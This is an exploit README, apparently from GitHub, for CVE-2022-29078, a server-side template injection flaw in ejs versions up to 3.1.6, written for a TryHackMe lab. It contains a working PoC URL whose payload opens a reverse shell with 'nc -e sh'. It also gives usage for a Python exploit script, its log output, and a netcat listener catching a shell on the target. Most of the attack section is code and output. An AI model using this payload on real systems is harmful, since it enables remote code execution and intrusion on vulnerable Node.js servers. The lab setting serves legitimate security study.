## https://sploitus.com/exploit?id=16D622A6-C7F9-52EC-8534-68952EEC5FBB
<h1 align="center">
THM Challenge: SSTI RCE
</h1>
<p align="center">
<img src="https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fl0n3m4n%2FCVE-2022-29078&label=Visitors&countColor=%2337d67a" />
<a href="https://www.facebook.com/l0n3m4n">
<img src="https://img.shields.io/badge/Facebook-%231877F2.svg?style=for-the-badge&logo=Facebook&logoColor=white" alt="Facebook">
</a>
<a href="https://www.twitter.com/l0n3m4n">
<img src="https://img.shields.io/badge/Twitter-%23000000.svg?style=for-the-badge&logo=X&logoColor=white" alt="X">
</a>
<a href="https://medium.com/@l0n3m4n">
<img src="https://img.shields.io/badge/Medium-12100E?style=for-the-badge&logo=medium&logoColor=white" alt="Medium">
</a>
<a href="https://www.python.org/">
<img src="https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54" alt="Python">
</a>
<a href="https://www.kali.org/">
<img src="https://img.shields.io/badge/Kali-268BEE?style=for-the-badge&logo=kalilinux&logoColor=white" alt="Kali">
</a>
</p>
<h1 align="center">
<img src="whiterose.jpeg" alt="whiterose" style="display: block; margin: auto;" />
</h1>
## Description
The ejs (Embedded JavaScript templates) package for Node.js, up to and including 3.1.6, allows server-side template injection through `settings[view options][outputFunctionName]`. When an application hands request data straight to the render call (for example `res.render('page', req.query)` behind Express's default extended query parser), ejs treats that nested key as an internal option and overwrites `outputFunctionName` with attacker-controlled text. That text is concatenated into the JavaScript source of the generated template function, so an arbitrary OS command placed there runs when the template is compiled and rendered for the request. ejs 3.1.7 fixes this by rejecting `outputFunctionName` values that are not plain JavaScript identifiers.
## Table of Contents
- [Description](#description)
- [POC](#poc)
- [Installation and Usage](#installation-and-usage)
- [Output](#output)
- [Log](#log)
- [Netcat listener](#netcat-listener)
- [References](#references)
## POC
```bash
http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s
```
The leading `x;` and trailing `;s` keep the generated code syntactically valid: ejs emits `var <outputFunctionName> = __append;`, so the injected value turns that line into `var x;<command>;s = __append;`. The PoC assumes the target passes the query string into the render options and that `127.0.0.1 1337` is replaced with a listener the target can reach; the `nc -e` option is only available on netcat builds that support it.
## Installation and Usage
```bash
$ git clone https://github.com/l0n3m4n/CVE-2022-29078.git
$ python3 -m venv venv && source venv/bin/activate && cd CVE-2022-29078
$ pip install colorama==0.4.6 && pip install requests==2.26.0
```
![burpsuite](burpsuite.png)
```bash
$ python3 CVE-2022-29078.py -h
_________ ____________________.___ .__ .__ __
/ _____// _____/\__ ___/| | ____ ___ _________ | | ____ |__|/ |_
\_____ \ \_____ \ | | | |/ __ \| \/ /\____ \| | / _ \| \ __|
/ \/ \ | | | \ ___/ > < | |_> > |_( <_> ) || |
/_______ /_______ / |____| |___|\___ >__/\_ \| __/|____/\____/|__||__|
\/ \/ \/ \/|__|
Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose
usage: CVE-2022-29078.py [-h] -t TARGET -u USER -p PASSWORD
Send a crafted POST request with custom URL, username, and password.
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target URL (e.g., http://admin.cyprusbank.thm/settings)
-u USER, --user USER Username to send in the request
-p PASSWORD, --password PASSWORD
Password to send in the request
Example: python3 exploit-ssti.py -t http://admin.cyprusbank.thm/settings -u user1 -p pa$$w0rd
```
## Output
```bash
_________ ____________________.___ .__ .__ __
/ _____// _____/\__ ___/| | ____ ___ _________ | | ____ |__|/ |_
\_____ \ \_____ \ | | | |/ __ \| \/ /\____ \| | / _ \| \ __|
/ \/ \ | | | \ ___/ > < | |_> > |_( <_> ) || |
/_______ /_______ / |____| |___|\___ >__/\_ \| __/|____/\____/|__||__|
\/ \/ \/ \/|__|
Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose
[!] The exploit will automatically exit once we received a 504 from the server
```
## Log
The 504 entries are expected rather than a failure: `execSync` blocks the render until the spawned reverse shell exits, so the front-end proxy times out on the request that actually delivered the shell, and the script uses that status as its exit signal.
```bash
$ cat exploit-ssti.log
2024-11-06 11:22:28,919 - INFO - Payload delivered successfully.
2024-11-06 11:32:47,806 - INFO - Payload delivered successfully.
2024-11-06 11:32:58,284 - INFO - Payload delivered successfully.
2024-11-06 11:37:13,616 - INFO - Payload delivered successfully.
2024-11-06 11:55:16,861 - WARNING - Connection failed with status code: 504
2024-11-06 11:59:27,820 - WARNING - Connection failed with status code: 504
```
## Netcat listener
```bash
$ sudo rlwrap -cAr nc -lvnp 443
[sudo] password for l0n3m4n:
listening on [any] 443 ...
connect to [10.2.4.61] from (UNKNOWN) [10.10.145.199] 38020
bash: cannot set terminal process group (1233): Inappropriate ioctl for device
bash: no job control in this shell
web@cyprusbank:~/app$
```
## References
- https://github.com/mde/ejs/issues/720
- https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-29078.yaml
- https://github.com/mde/ejs/releases
- https://eslam.io/posts/ejs-server-side-template-injection-rce
- https://security.netapp.com/advisory/ntap-20220804-0001